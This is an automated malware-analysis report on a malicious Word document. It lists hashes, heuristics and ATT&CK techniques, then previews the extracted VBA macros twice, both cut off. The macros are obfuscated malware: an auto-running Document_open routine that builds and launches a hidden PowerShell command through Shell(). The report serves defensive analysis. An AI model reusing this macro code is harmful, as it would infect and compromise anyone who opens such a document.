Office (OLE) malware analysis — malicious · 49541b566db1ff8b

MALICIOUS

Office (OLE)

96.0 KB Created: 2018-06-14 08:34:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 7a488468939f4ff25898933918897fd3 SHA-1: d6c711856ba2d18a65cd2e16d655a933d0eca6a1 SHA-256: 49541b566db1ff8bf8dbc975efcbf2d2daa1ff651e685cd47bb73f6ae132dbcf

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro is present and triggers a 'Shell()' call, indicating execution of arbitrary commands. The VBA script attempts to construct and execute a command, likely to download and run a secondary payload. The specific command construction is heavily obfuscated, but the intent is clear.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13646 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13646 bytes
SHA-256: `883480cd70dca8cdb806e15101473ac02f3c308d76a24520116cc0675cf26402`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "fIczJwp" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function JmaavwUCOlK() On Error Resume Next JIZPL = zlvFl - rVYEwR / 75941 / UtuJhw - 223327908 + Hex(ZQskT) * XEbJlc - Round(72678) jqpsi = Sqr(29760) UTvsd = wQBcQC jzYGr = 55854 + jlbjIn + (96966 * CDbl(lmQGt) - RnMJGh / CSng(55777) - DkOjjB / Hex(wqwNzV) + 68266 - 83080) SjpNpB = BKpDM - aobiAG / 54993 / jRLbGY - 223327908 + Hex(kwoRV) * AwzAEC - Round(86573) fZPrh = Sqr(74388) LSukBz = LlsbrU QNPhPL = 46202 + DVRuT + (31406 * CDbl(uKoBBI) - AZjwKN / CSng(60087) - IcTfoO / Hex(EMZVqP) + 47592 - 36747) VzvXaK = BdWHl - fuDvfb / 22789 / HSadt - 223327908 + Hex(VObuwk) * QSBSl - Round(29055) zBZVd = Sqr(13636) LBLMi = rwhqbK mRdlj = 55714 + RLAmq + (2022 * CDbl(rchvD) - DVQAPb / CSng(83474) - mRzqL / Hex(OfVOV) + 49968 - 81861) wpjFz = IEBuf - EXNMS / 24643 / VEpLOq - 223327908 + Hex(JICVH) * UzHGJj - Round(3823) QEnJNd = Sqr(92625) issNoN = FzdqCv OjVthO = 92364 + BcJBDO + (54221 * CDbl(dtMPi) - aMpfU / CSng(31127) - zEvpl / Hex(ljYDA) + 1118 - 83778) JmaavwUCOlK = TuIsETmUXUj + VBA.Shell(YZjkIRK + Chr(QCNjjuzWf + vbKeyP + DmkJjMzm) + "owers" + AwtDmUInYa + RrMrK + GmlrSbNrBYk + AlovzZPjNhm + UzmFN, 65557 - 65557) XFpadM = ZXtqi - bBfrGF / 28575 / LTkdaS - 223327908 + Hex(kRzFo) * DYRaQp - Round(66824) VTbVf = Sqr(54718) XUBGUW = sqbrAm wGiROb = 93002 + CfmsA + (12801 * CDbl(HDlKL) - koEtUl / CSng(33550) - biGAt / Hex(BbrRa) + 66543 - 44243) JhaVq = XQQCr - KFOWh / 82613 / ndUzP - 223327908 + Hex(SCLzLG) * PMVtE - Round(40410) wNmRrZ = Sqr(35834) UYjDn = UnkOaN MmEwD = 87550 + oFukp + (1829 * CDbl(dORqQ) - drvBZm / CSng(55358) - whkfbi / Hex(mMdMvi) + 26385 - 28648) End Function Private Sub Document_open() On Error Resume Next JiwWE = zMzSRI - swhdo / 38199 / jEKYl - 223327908 + Hex(kmCQh) * BjAikF - Round(3382) uiZkC = Sqr(67764) JGwifW = StzQjA iupjK = 87360 + BLRFv + (38509 * CDbl(wkURM) - shhqRt / CSng(70610) - JMjcG / Hex(kSjKt) + 53050 - 46033) IjbMh = fSKZT - OwQRz / 93952 / nDTXH - 223327908 + Hex(YKrGOw) * GviZO - Round(60696) DLIYf = Sqr(99129) nFhsc = AQvzw iLnEUa = 71489 + uKJikZ + (13910 * CDbl(rQzXnw) - aXSvSX / CSng(39479) - FUmJps / Hex(NJUUbc) + 93323 - 97302) JmaavwUCOlK Sowrpr = CTfqWz - pizqH / 46692 / rfdHW - 223327908 + Hex(VSMwzv) * VNIUPd - Round(95661) VqpNY = Sqr(3608) MiBJB = tkJnu bcLVo = 23955 + iJqnL + (92512 * CDbl(HzSUqC) - jqJBJ / CSng(41779) - lnBEMF / Hex(juapN) + 89849 - 93714) mDjrnL = uObZl - MHNFY / 70382 / iMtBiu - 223327908 + Hex(lhOlcJ) * uPMCPd - Round(71114) dwqiEi = Sqr(22683) HJWYwi = IqWQdt JSjSLQ = 68704 + itaIz + (54089 * CDbl(ibiaKj) - HjXzp / CSng(19936) - ahSvu / Hex(plwRh) + 16301 - 1060) End Sub Attribute VB_Name = "CGjPSQq" Function AwtDmUInYa() On Error Resume Next fjlaB = hdOjYU DFqUc = Sqr(94452) buWXt = 49755 + aGcfkj + (42048 * CDbl(wsjbQW) - EGUMr / CSng(35691) - pTaFb / Hex(aXiqi) + 56837 - 76839) VzwEtM = QDjiiU - JEiFA / 20377 / Ktsmip - 223327908 + Hex(AdrOV) * TWdAiJ - Round(69370) hnfvYnoW = "HeLL .( $e" + "nv:CoMSPec" + "[4,26,25]-" + "JOiN'') ( [" + "STriNG]::j" + "OIn( '" fJAzT = uAMPc hqaLH = Sqr(49637) DKEERK = 43020 + QZpTIt + (94443 * CDbl(biXraU) - jrnPhG / CSng(99035) - bmiXI / Hex(ZiXmv) + 82127 - 11600) skMjfU = ivpiQ - NjZVo / 40952 / vzEfd - 223327908 + Hex(PKwpV) * ZjjCWo - Round(56070) hzZMmwwDv = "',([cHAr[]] (2" + "6 ,77 " + ", 113 ,12" + "1 ,1" + "08,79 " + ", 30 ," + " 3, 30 ,80 , 91" NEczMZ = GAREXm VWddi = Sqr(51144) mtfjF = 12950 + BiFTj + (82940 * CDbl(diChL) - orWHS / CSng(7074) - IKfkwN / Hex(zqWqi) + 43127 - 83105) VOWMNj = WYNCjw - CVVVpZ / 75582 / Mzohc - 223327908 + Hex(zdpUA) * oQOmzR - Round(6951) pRQVkUH = " ,73 , 19 ,8" + "1 ,92,84" + ", 91 ,93 ,7" + "4 " + ",30 , 76,95" + ",80 , " + "90 , 81,8" zcjqu = SBIHt BEwKdR = Sqr(62798) pNCXX = 61527 + YWvYh + (61327 * CDbl(CmHjV) - W ... (truncated)

SHA-256: 883480cd70dca8cdb806e15101473ac02f3c308d76a24520116cc0675cf26402

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "fIczJwp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JmaavwUCOlK()
On Error Resume Next
JIZPL = zlvFl - rVYEwR / 75941 / UtuJhw - 223327908 + Hex(ZQskT) * XEbJlc - Round(72678)
jqpsi = Sqr(29760)
UTvsd = wQBcQC
jzYGr = 55854 + jlbjIn + (96966 * CDbl(lmQGt) - RnMJGh / CSng(55777) - DkOjjB / Hex(wqwNzV) + 68266 - 83080)
SjpNpB = BKpDM - aobiAG / 54993 / jRLbGY - 223327908 + Hex(kwoRV) * AwzAEC - Round(86573)
fZPrh = Sqr(74388)
LSukBz = LlsbrU
QNPhPL = 46202 + DVRuT + (31406 * CDbl(uKoBBI) - AZjwKN / CSng(60087) - IcTfoO / Hex(EMZVqP) + 47592 - 36747)
VzvXaK = BdWHl - fuDvfb / 22789 / HSadt - 223327908 + Hex(VObuwk) * QSBSl - Round(29055)
zBZVd = Sqr(13636)
LBLMi = rwhqbK
mRdlj = 55714 + RLAmq + (2022 * CDbl(rchvD) - DVQAPb / CSng(83474) - mRzqL / Hex(OfVOV) + 49968 - 81861)
wpjFz = IEBuf - EXNMS / 24643 / VEpLOq - 223327908 + Hex(JICVH) * UzHGJj - Round(3823)
QEnJNd = Sqr(92625)
issNoN = FzdqCv
OjVthO = 92364 + BcJBDO + (54221 * CDbl(dtMPi) - aMpfU / CSng(31127) - zEvpl / Hex(ljYDA) + 1118 - 83778)
JmaavwUCOlK = TuIsETmUXUj + VBA.Shell(YZjkIRK + Chr(QCNjjuzWf + vbKeyP + DmkJjMzm) + "owers" + AwtDmUInYa + RrMrK + GmlrSbNrBYk + AlovzZPjNhm + UzmFN, 65557 - 65557)
XFpadM = ZXtqi - bBfrGF / 28575 / LTkdaS - 223327908 + Hex(kRzFo) * DYRaQp - Round(66824)
VTbVf = Sqr(54718)
XUBGUW = sqbrAm
wGiROb = 93002 + CfmsA + (12801 * CDbl(HDlKL) - koEtUl / CSng(33550) - biGAt / Hex(BbrRa) + 66543 - 44243)
JhaVq = XQQCr - KFOWh / 82613 / ndUzP - 223327908 + Hex(SCLzLG) * PMVtE - Round(40410)
wNmRrZ = Sqr(35834)
UYjDn = UnkOaN
MmEwD = 87550 + oFukp + (1829 * CDbl(dORqQ) - drvBZm / CSng(55358) - whkfbi / Hex(mMdMvi) + 26385 - 28648)
End Function
Private Sub Document_open()
On Error Resume Next
JiwWE = zMzSRI - swhdo / 38199 / jEKYl - 223327908 + Hex(kmCQh) * BjAikF - Round(3382)
uiZkC = Sqr(67764)
JGwifW = StzQjA
iupjK = 87360 + BLRFv + (38509 * CDbl(wkURM) - shhqRt / CSng(70610) - JMjcG / Hex(kSjKt) + 53050 - 46033)
IjbMh = fSKZT - OwQRz / 93952 / nDTXH - 223327908 + Hex(YKrGOw) * GviZO - Round(60696)
DLIYf = Sqr(99129)
nFhsc = AQvzw
iLnEUa = 71489 + uKJikZ + (13910 * CDbl(rQzXnw) - aXSvSX / CSng(39479) - FUmJps / Hex(NJUUbc) + 93323 - 97302)
JmaavwUCOlK
Sowrpr = CTfqWz - pizqH / 46692 / rfdHW - 223327908 + Hex(VSMwzv) * VNIUPd - Round(95661)
VqpNY = Sqr(3608)
MiBJB = tkJnu
bcLVo = 23955 + iJqnL + (92512 * CDbl(HzSUqC) - jqJBJ / CSng(41779) - lnBEMF / Hex(juapN) + 89849 - 93714)
mDjrnL = uObZl - MHNFY / 70382 / iMtBiu - 223327908 + Hex(lhOlcJ) * uPMCPd - Round(71114)
dwqiEi = Sqr(22683)
HJWYwi = IqWQdt
JSjSLQ = 68704 + itaIz + (54089 * CDbl(ibiaKj) - HjXzp / CSng(19936) - ahSvu / Hex(plwRh) + 16301 - 1060)
End Sub


Attribute VB_Name = "CGjPSQq"
Function AwtDmUInYa()
On Error Resume Next
fjlaB = hdOjYU
DFqUc = Sqr(94452)
buWXt = 49755 + aGcfkj + (42048 * CDbl(wsjbQW) - EGUMr / CSng(35691) - pTaFb / Hex(aXiqi) + 56837 - 76839)
VzwEtM = QDjiiU - JEiFA / 20377 / Ktsmip - 223327908 + Hex(AdrOV) * TWdAiJ - Round(69370)
hnfvYnoW = "HeLL .( $e" + "nv:CoMSPec" + "[4,26,25]-" + "JOiN'') ( [" + "STriNG]::j" + "OIn( '"
fJAzT = uAMPc
hqaLH = Sqr(49637)
DKEERK = 43020 + QZpTIt + (94443 * CDbl(biXraU) - jrnPhG / CSng(99035) - bmiXI / Hex(ZiXmv) + 82127 - 11600)
skMjfU = ivpiQ - NjZVo / 40952 / vzEfd - 223327908 + Hex(PKwpV) * ZjjCWo - Round(56070)
hzZMmwwDv = "',([cHAr[]] (2" + "6 ,77 " + ", 113 ,12" + "1 ,1" + "08,79 " + ", 30 ," + " 3, 30 ,80 , 91"
NEczMZ = GAREXm
VWddi = Sqr(51144)
mtfjF = 12950 + BiFTj + (82940 * CDbl(diChL) - orWHS / CSng(7074) - IKfkwN / Hex(zqWqi) + 43127 - 83105)
VOWMNj = WYNCjw - CVVVpZ / 75582 / Mzohc - 223327908 + Hex(zdpUA) * oQOmzR - Round(6951)
pRQVkUH = " ,73 , 19 ,8" + "1 ,92,84" + ", 91 ,93 ,7" + "4 " + ",30 , 76,95" + ",80 , " + "90 , 81,8"
zcjqu = SBIHt
BEwKdR = Sqr(62798)
pNCXX = 61527 + YWvYh + (61327 * CDbl(CmHjV) - W
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.